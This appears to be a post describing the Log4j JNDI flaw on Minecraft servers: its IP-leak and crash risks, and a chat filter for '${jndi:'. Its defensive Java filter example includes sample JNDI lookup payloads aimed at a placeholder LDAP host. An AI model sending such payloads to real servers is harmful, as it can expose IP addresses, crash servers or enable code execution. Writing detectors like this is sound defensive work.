Log4j Remote Code Execution Exploit on Minecraft (read the description)

The good news: This exploit does not work on Java 8 and above by default because of this change (see "Improved protection for JNDI remote class loading"). This means you are most likely safe from code being executed on your machine.

The bad news: While the exploit does not work on Java 8 and above as mentioned before, it can still be used to discover the IP address of your server (this is problematic if your server runs behind a DDoS protection service such as TCPShield), freeze and subsequently crash your server, and discover the IP addresses of your players.

To my knowledge, Lunar Client is the first client to fix this issue. Servers can protect their users by blocking incoming and outgoing chat messages containing "${jndi:" (case insensitive!).
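One way to implement the chat check described above, as an added example in Java (not code from Lunar Client or any server project). The class name, the `allow` hook and the sample messages are hypothetical and constructed for illustration.

```java
import java.util.List;

public final class JndiChatFilter {
    // The marker named in the description above.
    private static final String MARKER = "${jndi:";

    private JndiChatFilter() {}

    /**
     * True if the message contains "${jndi:" in any letter case.
     * regionMatches(ignoreCase = true, ...) compares character by character
     * and ignores the JVM's default locale. A toLowerCase() comparison would
     * miss "${JNDI:" under a Turkish locale, where 'I' lower-cases to a
     * dotless 'ı'.
     */
    public static boolean containsJndiLookup(String message) {
        if (message == null) return false;
        int last = message.length() - MARKER.length();
        for (int i = 0; i <= last; i++) {
            if (message.regionMatches(true, i, MARKER, 0, MARKER.length())) return true;
        }
        return false;
    }

    /**
     * Hypothetical hook: call it for incoming and for outgoing chat.
     * Returns true if the message may be delivered.
     */
    public static boolean allow(String direction, String player, String message) {
        if (!containsJndiLookup(message)) return true;
        // Record metadata only. Passing the raw message to a Log4j logger
        // would evaluate the very lookup this filter is blocking.
        System.err.printf("blocked %s chat message from %s (%d chars)%n",
                direction, player, message.length());
        return false;
    }

    public static void main(String[] args) {
        // Constructed sample messages; the host name is a placeholder.
        List<String> samples = List.of(
                "hello everyone",
                "${jndi:ldap://placeholder.invalid/a}",
                "look at this ${JnDi:ldap://placeholder.invalid/a}",
                "price is ${5} today");
        for (String s : samples) {
            System.out.println(allow("incoming", "SamplePlayer", s) + "  <-  " + s);
        }
    }
}
```

The filter has to sit on both paths: incoming chat protects the server's own logging, and outgoing chat protects clients that have not been fixed.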